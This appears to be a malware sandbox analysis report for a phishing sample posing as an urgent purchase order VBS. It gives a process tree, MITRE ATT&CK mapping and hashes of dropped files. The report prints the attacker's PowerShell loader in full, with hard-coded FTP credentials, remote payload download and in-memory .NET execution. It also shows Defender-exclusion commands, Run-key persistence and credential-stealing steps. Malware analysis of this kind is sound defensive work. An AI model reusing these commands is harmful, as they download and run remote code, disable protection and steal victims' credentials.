(New-Object Net.WebClient);$zbxkl.Encoding = [System.Text.Encoding]::UTF8;$zbxkl.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zbxkl.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$zbxkl.dispose();$zbxkl = (New-Object Net.WebClient);$zbxkl.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zbxkl.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\Urgent Purchase Order (P.O.) No.477764107102024.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3028
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
      4⤵
      PID:4288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\ogcnc.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2456
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Suspicious use of SetThreadContext
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:396
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\kbqlgjjfolpatdepydvwqyodgf"
        6⤵
        
        PID:4924
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\kbqlgjjfolpatdepydvwqyodgf"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:688
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\udvvhtuhktievjathniptdjuomhzjy"
        6⤵
        
        PID:1228
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\udvvhtuhktievjathniptdjuomhzjy"
        6⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2936
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxaohmfaybargxoxzyvreqddpayakjyeh"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4980
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ysdkpitakztqkzyyqabnlu.vbs"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5092
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Urgent Purchase Order (P.O.) No.477764107102024.vbs"
      4⤵
      PID:2844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c2edc7df60d16dbea2389b043dc446c1

SHA1
0b4cb20cb368cbbb6100905f57278a690ca5da8a

SHA256
36270ae5039121c418a460a61457a4e3301f3a2525f1fa5dd99c8d0a92c67cf5

SHA512
dc3e0de12bd1f8eafecc61b466f0040078e766af02bb9a70d816edda8b6e71e7af995e27a437382fc0e490c32f78c581c200fe6b8b364f90fe73d972e8d1eb4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3a1e249212d4af8ee7f335a5dfd075ba

SHA1
8ab2019e5d1376124bd79b822b9b1d4a794de076

SHA256
046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa

SHA512
8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_233u1uke.uik.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kbqlgjjfolpatdepydvwqyodgf

Filesize
4KB

MD5
18db1829b27eaeed163c211f5d179d72

SHA1
4442332494cba1e012f8876ecac42126ba995bc6

SHA256
610c5ee3f0e63441521d26bc477c9618a4c5f86e93d31b31890680c69e3ecc3d

SHA512
123d68b2c84f7a52d15faa212c06f33b04a55585e2aeb16bb14df95b18c0bcf31933e5bf0c736c90bc054b9527fccb046540d3302a0f149ebeed7c6bcca0b986

Download Submit
C:\Users\Admin\AppData\Local\Temp\ysdkpitakztqkzyyqabnlu.vbs

Filesize
388B

MD5
9f5abc5f9a54a2e09861c697dd3574f7

SHA1
9988766052eade5cf5042b7fabd3f3c934d45b83

SHA256
41f75329438ed7ba3bd0b09d3e44f0a874a41f1bf473f81521dc8c5d3e2d67b1

SHA512
268d335a1df39890dc8b94c517a7eb7d85e5e41696b4654c14ea8e98887dc22bad59ea64a4cd1da9f45617b6054d7c42ead291e7a42a882297d0abc4aab37833

Download Submit
C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\ogcnc.ps1

Filesize
1.9MB

MD5
55e919661f9de24b48b149e427a7bc4c

SHA1
1094551a4ebe9137de836ff8af6457aea18b8b6e

SHA256
1c0beeeddd3e4ed060af90342743046948dfcd4573745f66b4b697c5b7cc0823

SHA512
505113eac6f00c7ece2fec7e520a276cd67bc31a97545ffde4623d09a5d670f4f2a2dd660f06bf5bf5d87f8f9c0ddcb1ca2659aef98531d571d2bad70e6f9041

Download Submit
C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1

Filesize
393B

MD5
141a84eaf7a54e15b538650b1e753cf0

SHA1
b6e62f509775c912c4287bae78316157f17d24c5

SHA256
472bc4cba6331f7c78bce3d75bc15ba387d48d0cf8758027e44e4740cb76b2fd

SHA512
c5a2fe35d0860c43958a7d99b989acc6f1636690b6d67f0beccff7f65bd11e1e8cbe1eb7dfbb0472d6010b0981eb0d97c2c9aea60e30fa5e94c173b1164040ac

Download Submit
memory/396-85-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-92-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-129-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-130-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-127-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-131-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-126-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-81-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-83-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-136-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-88-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-89-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-90-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-128-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-93-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-94-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-96-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-125-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-124-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-123-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-122-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-121-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-118-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-117-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/396-116-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/396-113-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/396-110-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/396-109-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/688-97-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/688-104-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/688-100-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2456-80-0x00000181F3D20000-0x00000181F3D34000-memory.dmp

Filesize
80KB

Download
memory/2936-98-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2936-105-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2936-103-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4352-0-0x00007FFAEDF93000-0x00007FFAEDF95000-memory.dmp

Filesize
8KB

Download
memory/4352-66-0x00007FFAEDF90000-0x00007FFAEEA51000-memory.dmp

Filesize
10.8MB

Download
memory/4352-60-0x00007FFAEDF90000-0x00007FFAEEA51000-memory.dmp

Filesize
10.8MB

Download
memory/4352-59-0x00007FFAEDF93000-0x00007FFAEDF95000-memory.dmp

Filesize
8KB

Download
memory/4352-12-0x00007FFAEDF90000-0x00007FFAEEA51000-memory.dmp

Filesize
10.8MB

Download
memory/4352-11-0x00007FFAEDF90000-0x00007FFAEEA51000-memory.dmp

Filesize
10.8MB

Download
memory/4352-6-0x000001F1E4360000-0x000001F1E4382000-memory.dmp

Filesize
136KB

Download
memory/4980-102-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4980-99-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4980-101-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5040-22-0x0000022F1A5E0000-0x0000022F1A5EA000-memory.dmp

Filesize
40KB

Download